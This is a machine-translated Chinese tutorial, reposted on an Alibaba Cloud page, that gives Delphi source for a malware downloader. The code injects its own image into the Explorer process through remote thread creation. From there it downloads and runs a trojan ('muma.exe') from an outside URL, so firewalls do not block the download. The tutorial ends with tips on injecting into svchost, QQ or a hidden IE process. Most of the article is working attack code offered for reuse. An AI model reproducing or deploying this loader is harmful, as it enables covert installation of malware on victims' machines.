Build a non-DLL version of penetration Firewall downloader

Source: Internet
Author: User

The idea of this code comes from the Aphex of foreign ees organizations. Basically all non-DLL download are used in this way. In fact, the use of rotten remote injection method. But the injected object is not a DLL, but a process of itself. Below is the code, because my professional knowledge is not enough, there may be some statements are not too professional. Please make a look at it. If you don't understand, please keep abreast.

Program Injecttheself;

{$IMAGEBASE $13140000}

Uses Windows, Urlmon;


Procedure Download; Download process
Begin
Urldownloadtofile (Nil, ' http://www.mycode.ful.cn/muma.exe ', ' C:\muma.exe ', 0, nil);
WinExec (' C:\muma.exe ', sw_show); Sw_show or Sw_hide
End


Var
Hmodule, Hmodule_news:pointer;
Extent, Size, Threadid:longword;
ProcessHandle, Pid:longword;


Begin
GetWindowThreadProcessId (FindWindow (' Shell_traywnd ', nil), @Pid);
Get the EXP process PID code, Shell_traywnd for the class name, related to need Spy + + to view

ProcessHandle: = OpenProcess (Process_all_access, False, Pid); Open process

Hmodule: = Pointer (GetModuleHandle (nil));
The value obtained here is a pointer-type variable that points to the content including the base address and length of its own image

Extent: = Pimageoptionalheader (Pointer (Integer (hmodule) + Pimagedosheader (hmodule). _lfanew + sizeof (DWORD) + sizeof ( Timagefileheader)). Sizeofimage;
Get the length of the memory image

VirtualFreeEx (ProcessHandle, hmodule, 0, mem_release);
Allocate a sufficient length of memory within the memory range of the EXP process

Hmodule_news: = VirtualAllocEx (ProcessHandle, hmodule, Extent, Mem_commit or Mem_reserve, page_execute_readwrite);
Determining the location of the starting base and memory image base addresses

WriteProcessMemory (ProcessHandle, Hmodule_news, hmodule, Extent, Size);
Once you have identified the above data, start the operation here

CreateRemoteThread (ProcessHandle, nil, 0, @Download, hmodule, 0, ThreadId);
Set up a remote thread so that the injection process is complete

CloseHandle (ProcessHandle);
Close the image
End.

It is necessary to note that although this is already a full-wall version of the downloader code. But it still has a lot of bugs. If you want to write your own downloader, please address the following questions :

1, the above code to use the remote injection method used by the function under Windows9x not.
2. Windows and some applications protect certain processes and do not allow the process to operate over-privileged. such as Svchost, QQ and other processes of injection, must first carry out the right to operate.
3, if you need to inject into ie. Please first use WinExec's sw_hide mode to open a hidden IE process, suspend the program for 3 seconds before injecting. This is for some old machines.

Build a non-DLL version of penetration Firewall downloader

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.